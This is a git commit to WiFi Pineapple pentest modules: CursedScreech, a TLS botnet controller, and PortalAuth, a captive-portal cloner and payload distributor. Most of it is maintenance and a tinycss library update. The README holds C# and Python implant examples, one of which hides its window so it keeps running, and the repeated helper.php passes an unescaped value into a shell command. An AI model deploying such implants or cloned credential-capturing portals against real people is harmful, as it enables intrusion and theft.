Portal Auth and Cursed Screech Updates

This commit is contained in:
sud0nick 2018-07-15 23:51:02 -04:00
parent ae53ba8ea1
commit 5189bc5bc3
76 changed files with 2585 additions and 5974 deletions

66
CursedScreech/README.md Normal file
View File

@ -0,0 +1,66 @@
# CursedScreech
A mass communicator module for the WiFi Pineapple that utilizes TLS to control a botnet of compromised systems. Included is a C# API and Python API (with documentation) to write payloads that can communicate with CursedScreech and PortalAuth.
# APIs
I recommend using C# over Python to build your payload. Both APIs are really simple to use but using C# will allow you to create a self-contained executable along with required keys/certificates. Writing your payload in Python will require you to freeze your code and it can be difficult, if not impossible, to include all required files in a single executable. If you can't make a single executable you will have to find a way to move the whole dist directory to the target machine.
### C# API Example
```
using System;
using System.Drawing;
using System.Windows.Forms;
using PineappleModules;
namespace Payload
{
public partial class Form1 : Form {
PA_Authorization pauth = new PA_Authorization();
public Form1() {
InitializeComponent();
CursedScreech cs = new CursedScreech();
cs.startMulticaster("231.253.78.29", 19578);
cs.setRemoteCertificateSerial("EF-BE-AD-DE");
cs.setRemoteCertificateHash("1234567890ABCDEF");
cs.startSecureServerThread("Payload.Payload.pfx", "#$My$ecuR3P4ssw*rd&");
}
private void Form1_FormClosing(object sender, FormClosingEventArgs e) {
e.Cancel = true;
this.Hide();
}
private void accessKeyButton_Click(object sender, EventArgs e) {
// Request an access key from the Pineapple
string key = pauth.getAccessKey();
// Check if a key was returned
string msg;
if (key.Length > 0) {
msg = "Your access key is unique to you so DO NOT give it away!\n\nAccess Key: " + key;
}
else {
msg = "Failed to retrieve an access key from the server. Please try again later.";
}
// Display message to the user
MessageBox.Show(msg);
}
}
}
```
### Python API Example
```
from PineappleModules import CursedScreech
cs = CursedScreech("Network Client")
cs.startMulticaster("231.253.78.29", 19578)
cs.setRemoteCertificateSerial("ABCDEF1234567890")
cs.startSecureServerThread("payload.pem", "payload.cer", "cursedscreech.cer")
```

View File

@ -165,6 +165,14 @@ class CursedScreech extends Module {
return false;
}
}
if (!file_exists(__TARGETLOGS__)) {
if (!mkdir(__TARGETLOGS__, 0755, true)) {
$this->logError("Failed init", "Failed to initialize because the targetlogs directory at '" . __TARGETLOGS__ . "' could not be created.");
$this->respond(false);
return false;
}
}
}
/* ============================ */

View File

@ -0,0 +1,4 @@
July 15, 2018
<br /><br />
- Added check for targetlogs directory at startup<br />

View File

@ -6,5 +6,5 @@
"tetra"
],
"title": "CursedScreech",
"version": "1.4"
"version": "1.5"
}

2
PortalAuth/README.md Normal file
View File

@ -0,0 +1,2 @@
# PortalAuth
Captive portal cloner and payload distributor for the WiFi Pineapple NANO and TETRA

View File

@ -11,11 +11,11 @@ define('__LOGS__', __INCLUDES__ . "logs/");
define('__HELPFILES__', __INCLUDES__ . "help/");
define('__CHANGELOGS__', __INCLUDES__ . "changelog/");
define('__SCRIPTS__', __INCLUDES__ . "scripts/");
// Injection set defines
define('__INJECTS__', __SCRIPTS__ . "injects/");
define('__SKELETON__', __SCRIPTS__. "skeleton/");
// NetClient defines
define('__DOWNLOAD__', "/www/download/");
define('__WINDL__', __DOWNLOAD__ . "windows/");
@ -25,6 +25,7 @@ define('__IOSDL__', __DOWNLOAD__ . "ios/");
// PASS defines
define('__PASSDIR__', __INCLUDES__ . "pass/");
define('__KEYDIR__', __PASSDIR__ . "keys/");
define('__PASSSRV__', __PASSDIR__ . "pass.py");
define('__PASSBAK__', __PASSDIR__ . "Backups/pass.py");
define('__PASSLOG__', __PASSDIR__ . "pass.log");
@ -240,7 +241,14 @@ class PortalAuth extends Module
private function init() {
if (!file_exists(__LOGS__)) {
if (!mkdir(__LOGS__, 0755, true)) {
$this->respond(false, "Failed to create logs directory");
$this->respond(false, "Failed to create logs directory at " . __LOGS__);
return false;
}
}
if (!file_exists(__KEYDIR__)) {
if (!mkdir(__KEYDIR__, 0755, true)) {
$this->logError("Failed init", "Failed to initialize because the keys directory at '" . __KEYDIR__ . "' could not be created.");
$this->respond(false);
return false;
}
}
@ -284,7 +292,13 @@ class PortalAuth extends Module
//======================//
private function checkIsOnline() {
$this->respond(checkdnsrr("wifipineapple.com", "A"));
$connected = @fsockopen("www.wifipineapple.com", 443);
if ($connected) {
fclose($connected);
$this->respond(true);
return true;
}
$this->respond(false);
}
private function getCapturedCreds() {
if (file_exists(__AUTHLOG__)) {

View File

@ -0,0 +1,6 @@
July 15, 2018
<br /><br />
- Added check for keys directory at startup<br />
- Updated TinyCSS lib to v0.4<br />
- Updated format of cloned portals to function with the latest Evil Portal<br />
- Added Basic and Targeted portal types for cloned portals<br />

View File

@ -25,3 +25,4 @@ Select these checkboxes to modify the cloned portal.<br /><br />
<strong>Inject JS:</strong> Injects the JavaScript from the selected Injection Set into the portal.<br />
<strong>Inject CSS:</strong> Injects the CSS from the selected Injection Set into the portal.<br />
<strong>Inject HTML:</strong> Injects the HTML from the selected Injection Set into the portal.<br />
<strong>Targeted Portal:</strong> Makes the cloned portal a targeted portal in the Evil Portal module.<br />

View File

@ -21,7 +21,7 @@ from bs4 import BeautifulSoup
class PortalCloner:
def __init__(self, portalName, directory, injectSet):
def __init__(self, portalName, directory, injectSet, targeted):
self.portalName = portalName
self.portalDirectory = directory + self.portalName + "/"
self.resourceDirectory = self.portalDirectory + "resources/"
@ -33,6 +33,7 @@ class PortalCloner:
self.session = requests.Session()
self.basePath = '/pineapple/modules/PortalAuth/'
self.uas = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"}
self.targeted = targeted
def find_meta_refresh(self, r):
@ -302,10 +303,16 @@ class PortalCloner:
# Copy the MyPortal PHP script to portalDirectory
shutil.copy(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/MyPortal.php', self.portalDirectory)
# Copy the helper PHP script to portalDirectory
shutil.copy(self.basePath + 'includes/scripts/injects/' + self.injectionSet + '/helper.php', self.portalDirectory)
# Create the required .ep file
with open(self.portalDirectory + self.portalName + ".ep", 'w+') as epFile:
epFile.write("DO NOT DELETE THIS")
if self.targeted:
epFile.write("{\"name\":\"" + self.portalName + "\",\"type\":\"targeted\",\"targeted_rules\":{\"default\":\"default.php\",\"rule_order\":[\"mac\",\"ssid\",\"hostname\",\"useragent\"],\"rules\":{\"mac\":{\"exact\":[],\"regex\":[]},\"ssid\":{\"exact\":[],\"regex\":[]},\"hostname\":{\"exact\":[],\"regex\":[]},\"useragent\":{\"exact\":[],\"regex\":[]}}}}")
else:
epFile.write("{\"name\":\"" + self.portalName + "\",\"type\":\"basic\"}")
# Copy jquery to the portal directory
shutil.copy(self.basePath + 'includes/scripts/jquery-2.2.1.min.js', self.portalDirectory)

View File

@ -11,10 +11,10 @@ class MyPortal extends Portal
// Check for other form data here
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -11,10 +11,10 @@ class MyPortal extends Portal
// Check for other form data here
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -0,0 +1,45 @@
<?php
/**
* getClientMac
* Gets the mac address of a client by the IP address
* Returns the mac address as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientMac($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
* getClientSSID
* Gets the SSID a client is associated by the IP address
* Returns the SSID as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientSSID($clientIP)
{
// Get the clients mac address. We need this to get the SSID
$mac = getClientMac($clientIP);
// get the path to the log file
$pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
// get the ssid
return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
* getClientHostName
* Gets the host name of the connected client by the IP address
* Returns the host name as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientHostName($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -0,0 +1,45 @@
<?php
/**
* getClientMac
* Gets the mac address of a client by the IP address
* Returns the mac address as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientMac($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
* getClientSSID
* Gets the SSID a client is associated by the IP address
* Returns the SSID as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientSSID($clientIP)
{
// Get the clients mac address. We need this to get the SSID
$mac = getClientMac($clientIP);
// get the path to the log file
$pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
// get the ssid
return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
* getClientHostName
* Gets the host name of the connected client by the IP address
* Returns the host name as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientHostName($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -20,10 +20,10 @@ class MyPortal extends Portal
fclose($fh);
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -20,10 +20,10 @@ class MyPortal extends Portal
fclose($fh);
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -0,0 +1,45 @@
<?php
/**
* getClientMac
* Gets the mac address of a client by the IP address
* Returns the mac address as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientMac($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
* getClientSSID
* Gets the SSID a client is associated by the IP address
* Returns the SSID as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientSSID($clientIP)
{
// Get the clients mac address. We need this to get the SSID
$mac = getClientMac($clientIP);
// get the path to the log file
$pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
// get the ssid
return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
* getClientHostName
* Gets the host name of the connected client by the IP address
* Returns the host name as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientHostName($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -0,0 +1,45 @@
<?php
/**
* getClientMac
* Gets the mac address of a client by the IP address
* Returns the mac address as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientMac($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
* getClientSSID
* Gets the SSID a client is associated by the IP address
* Returns the SSID as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientSSID($clientIP)
{
// Get the clients mac address. We need this to get the SSID
$mac = getClientMac($clientIP);
// get the path to the log file
$pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
// get the ssid
return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
* getClientHostName
* Gets the host name of the connected client by the IP address
* Returns the host name as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientHostName($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -20,10 +20,10 @@ class MyPortal extends Portal
fclose($fh);
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -20,10 +20,10 @@ class MyPortal extends Portal
fclose($fh);
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -0,0 +1,45 @@
<?php
/**
* getClientMac
* Gets the mac address of a client by the IP address
* Returns the mac address as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientMac($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
* getClientSSID
* Gets the SSID a client is associated by the IP address
* Returns the SSID as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientSSID($clientIP)
{
// Get the clients mac address. We need this to get the SSID
$mac = getClientMac($clientIP);
// get the path to the log file
$pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
// get the ssid
return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
* getClientHostName
* Gets the host name of the connected client by the IP address
* Returns the host name as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientHostName($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -0,0 +1,45 @@
<?php
/**
* getClientMac
* Gets the mac address of a client by the IP address
* Returns the mac address as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientMac($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
* getClientSSID
* Gets the SSID a client is associated by the IP address
* Returns the SSID as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientSSID($clientIP)
{
// Get the clients mac address. We need this to get the SSID
$mac = getClientMac($clientIP);
// get the path to the log file
$pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
// get the ssid
return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
* getClientHostName
* Gets the host name of the connected client by the IP address
* Returns the host name as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientHostName($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -9,10 +9,10 @@ class MyPortal extends Portal
parent::handleAuthorization();
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -9,10 +9,10 @@ class MyPortal extends Portal
parent::handleAuthorization();
}
public function showSuccess()
public function onSuccess()
{
// Calls default success message
parent::showSuccess();
parent::onSuccess();
}
public function showError()

View File

@ -0,0 +1,45 @@
<?php
/**
* getClientMac
* Gets the mac address of a client by the IP address
* Returns the mac address as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientMac($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
* getClientSSID
* Gets the SSID a client is associated by the IP address
* Returns the SSID as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientSSID($clientIP)
{
// Get the clients mac address. We need this to get the SSID
$mac = getClientMac($clientIP);
// get the path to the log file
$pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
// get the ssid
return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
* getClientHostName
* Gets the host name of the connected client by the IP address
* Returns the host name as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientHostName($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -0,0 +1,45 @@
<?php
/**
* getClientMac
* Gets the mac address of a client by the IP address
* Returns the mac address as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientMac($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
}
/**
* getClientSSID
* Gets the SSID a client is associated by the IP address
* Returns the SSID as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientSSID($clientIP)
{
// Get the clients mac address. We need this to get the SSID
$mac = getClientMac($clientIP);
// get the path to the log file
$pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
// get the ssid
return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
}
/**
* getClientHostName
* Gets the host name of the connected client by the IP address
* Returns the host name as a string
* @param $clientIP : The clients IP address
* @return string
*/
function getClientHostName($clientIP)
{
return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
}

View File

@ -1,8 +1,8 @@
Metadata-Version: 1.1
Name: tinycss
Version: 0.3
Version: 0.4
Summary: tinycss is a complete yet simple CSS parser for Python.
Home-page: http://packages.python.org/tinycss/
Home-page: http://tinycss.readthedocs.io/
Author: Simon Sapin
Author-email: simon.sapin@exyr.org
License: BSD
@ -13,6 +13,7 @@ Description: tinycss: CSS parser for Python
syntax and error handling for CSS 2.1 as well as some CSS 3 modules:
* CSS Color 3
* CSS Fonts 3
* CSS Paged Media 3
It is designed to be easy to extend for new CSS modules and syntax,
@ -21,7 +22,7 @@ Description: tinycss: CSS parser for Python
Quick facts:
* Free software: BSD licensed
* Compatible with Python 2.6+ and 3.x
* Compatible with Python 2.7 and 3.x
* Latest documentation `on python.org`_
* Source, issues and pull requests `on Github`_
* Releases `on PyPI`_
@ -33,12 +34,14 @@ Description: tinycss: CSS parser for Python
.. _on PyPI: http://pypi.python.org/pypi/tinycss
Platform: UNKNOWN
Classifier: Development Status :: 3 - Alpha
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: BSD License
Classifier: Programming Language :: Python :: 2
Classifier: Programming Language :: Python :: 2.6
Classifier: Programming Language :: Python :: 2.7
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.1
Classifier: Programming Language :: Python :: 3.2
Classifier: Programming Language :: Python :: 3.3
Classifier: Programming Language :: Python :: 3.4
Classifier: Programming Language :: Python :: 3.5
Classifier: Programming Language :: Python :: Implementation :: CPython
Classifier: Programming Language :: Python :: Implementation :: PyPy

View File

@ -1,11 +1,12 @@
.coveragerc
.gitignore
.travis.yml
CHANGES
LICENSE
MANIFEST.in
README.rst
setup.cfg
setup.py
tox.ini
docs/changelog.rst
docs/conf.py
docs/css3.rst
@ -19,6 +20,7 @@ tinycss/__init__.py
tinycss/color3.py
tinycss/css21.py
tinycss/decoding.py
tinycss/fonts3.py
tinycss/page3.py
tinycss/parsing.py
tinycss/speedups.c
@ -29,6 +31,7 @@ tinycss/version.py
tinycss.egg-info/PKG-INFO
tinycss.egg-info/SOURCES.txt
tinycss.egg-info/dependency_links.txt
tinycss.egg-info/requires.txt
tinycss.egg-info/top_level.txt
tinycss/tests/__init__.py
tinycss/tests/speed.py
@ -36,5 +39,6 @@ tinycss/tests/test_api.py
tinycss/tests/test_color3.py
tinycss/tests/test_css21.py
tinycss/tests/test_decoding.py
tinycss/tests/test_fonts3.py
tinycss/tests/test_page3.py
tinycss/tests/test_tokenizer.py

View File

@ -0,0 +1,6 @@
[test]
pytest-runner
pytest-cov
pytest-flake8
pytest-isort

View File

@ -0,0 +1,10 @@
[run]
branch = True
[report]
exclude_lines =
pragma: no cover
def __repr__
except ImportError
omit =
tinycss/tests/speed.py

View File

@ -0,0 +1,12 @@
*.pyc
*.c
*.so
*.egg-info
/.coverage
/htmlcov
/build
/dist
/.tox
/MANIFEST
/docs/_build
/env

View File

@ -0,0 +1,16 @@
language: python
python:
- "2.7"
- "3.3"
- "3.4"
- "3.5"
- "pypy"
- "pypy3"
install:
- pip install Cython
- pip install --upgrade -e .[test]
script:
- python setup.py test

View File

@ -0,0 +1,53 @@
tinycss changelog
=================
Version 0.4
-----------
Released on 2016-09-23.
* Add an __eq__ operator to Token object.
* Support Fonts 3.
Version 0.3
-----------
Released on 2012-09-18.
* Fix a bug when parsing \5c (an escaped antislash.)
Version 0.2
-----------
Released on 2012-04-27.
**Breaking changes:**
* Remove the ``selectors3`` module. The functionality has moved to the
`cssselect <http://packages.python.org/cssselect/>`_ project.
* Simplify the API for :func:`~tinycss.make_parser`.
Version 0.1.1
-------------
Released on 2012-04-06.
Bug fixes:
* Error handling on exepected end of stylesheet in an at-rule head
* Fix the installation on ASCII-only locales
Version 0.1
-----------
Released on 2012-04-05.
First release. Parser support for CSS 2.1, Seloctors 3, Color 3 and
Paged Media 3.

View File

@ -0,0 +1,31 @@
Copyright (c) 2012 by Simon Sapin.
Some rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* The names of the contributors may not be used to endorse or
promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

View File

@ -0,0 +1,3 @@
include README.rst CHANGES LICENSE tox.ini .coveragerc tinycss/speedups.c
recursive-include docs *
prune docs/_build

View File

@ -0,0 +1,47 @@
Metadata-Version: 1.1
Name: tinycss
Version: 0.4
Summary: tinycss is a complete yet simple CSS parser for Python.
Home-page: http://tinycss.readthedocs.io/
Author: Simon Sapin
Author-email: simon.sapin@exyr.org
License: BSD
Description: tinycss: CSS parser for Python
==============================
*tinycss* is a complete yet simple CSS parser for Python. It supports the full
syntax and error handling for CSS 2.1 as well as some CSS 3 modules:
* CSS Color 3
* CSS Fonts 3
* CSS Paged Media 3
It is designed to be easy to extend for new CSS modules and syntax,
and integrates well with cssselect_ for Selectors 3 support.
Quick facts:
* Free software: BSD licensed
* Compatible with Python 2.7 and 3.x
* Latest documentation `on python.org`_
* Source, issues and pull requests `on Github`_
* Releases `on PyPI`_
* Install with ``pip install tinycss``
.. _cssselect: http://packages.python.org/cssselect/
.. _on python.org: http://packages.python.org/tinycss/
.. _on Github: https://github.com/SimonSapin/tinycss/
.. _on PyPI: http://pypi.python.org/pypi/tinycss
Platform: UNKNOWN
Classifier: Development Status :: 4 - Beta
Classifier: Intended Audience :: Developers
Classifier: License :: OSI Approved :: BSD License
Classifier: Programming Language :: Python :: 2
Classifier: Programming Language :: Python :: 2.7
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.3
Classifier: Programming Language :: Python :: 3.4
Classifier: Programming Language :: Python :: 3.5
Classifier: Programming Language :: Python :: Implementation :: CPython
Classifier: Programming Language :: Python :: Implementation :: PyPy

View File

@ -0,0 +1,26 @@
tinycss: CSS parser for Python
==============================
*tinycss* is a complete yet simple CSS parser for Python. It supports the full
syntax and error handling for CSS 2.1 as well as some CSS 3 modules:
* CSS Color 3
* CSS Fonts 3
* CSS Paged Media 3
It is designed to be easy to extend for new CSS modules and syntax,
and integrates well with cssselect_ for Selectors 3 support.
Quick facts:
* Free software: BSD licensed
* Compatible with Python 2.7 and 3.x
* Latest documentation `on python.org`_
* Source, issues and pull requests `on Github`_
* Releases `on PyPI`_
* Install with ``pip install tinycss``
.. _cssselect: http://packages.python.org/cssselect/
.. _on python.org: http://packages.python.org/tinycss/
.. _on Github: https://github.com/SimonSapin/tinycss/
.. _on PyPI: http://pypi.python.org/pypi/tinycss

View File

@ -0,0 +1,24 @@
div.body {
text-align: left;
}
div.document p, div.document ul {
margin-top: 0;
margin-bottom: 1em;
}
div.document ul ul {
margin-top: 0;
margin-bottom: .5em;
}
.field-name {
padding-right: .5em;
}
table.field-list p, table.field-list ul {
margin-bottom: .5em;
}
table {
border-collapse: collapse;
margin-bottom: 1em;
}
table.docutils td, table.docutils th {
padding: .2em .5em;
}

View File

@ -0,0 +1,4 @@
{% extends "!layout.html" %}
{% block extrahead %}
<link rel="stylesheet" href="{{ pathto('_static/custom.css', 1) }}" />
{% endblock %}

View File

@ -0,0 +1 @@
.. include:: ../CHANGES

View File

@ -0,0 +1,252 @@
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# tinycss documentation build configuration file, created by
# sphinx-quickstart on Tue Mar 27 14:20:34 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.intersphinx',
'sphinx.ext.viewcode', 'sphinx.ext.doctest']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'tinycss'
copyright = '2012, Simon Sapin'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
#release = '0.1dev'
import re
with open(os.path.join(os.path.dirname(__file__), '..',
'tinycss', 'version.py')) as init_py:
release = re.search("VERSION = '([^']+)'", init_py.read()).group(1)
# The short X.Y version.
version = release.rstrip('dev')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#html_theme = 'agogo'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'tinycssdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'tinycss.tex', 'tinycss Documentation',
'Simon Sapin', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
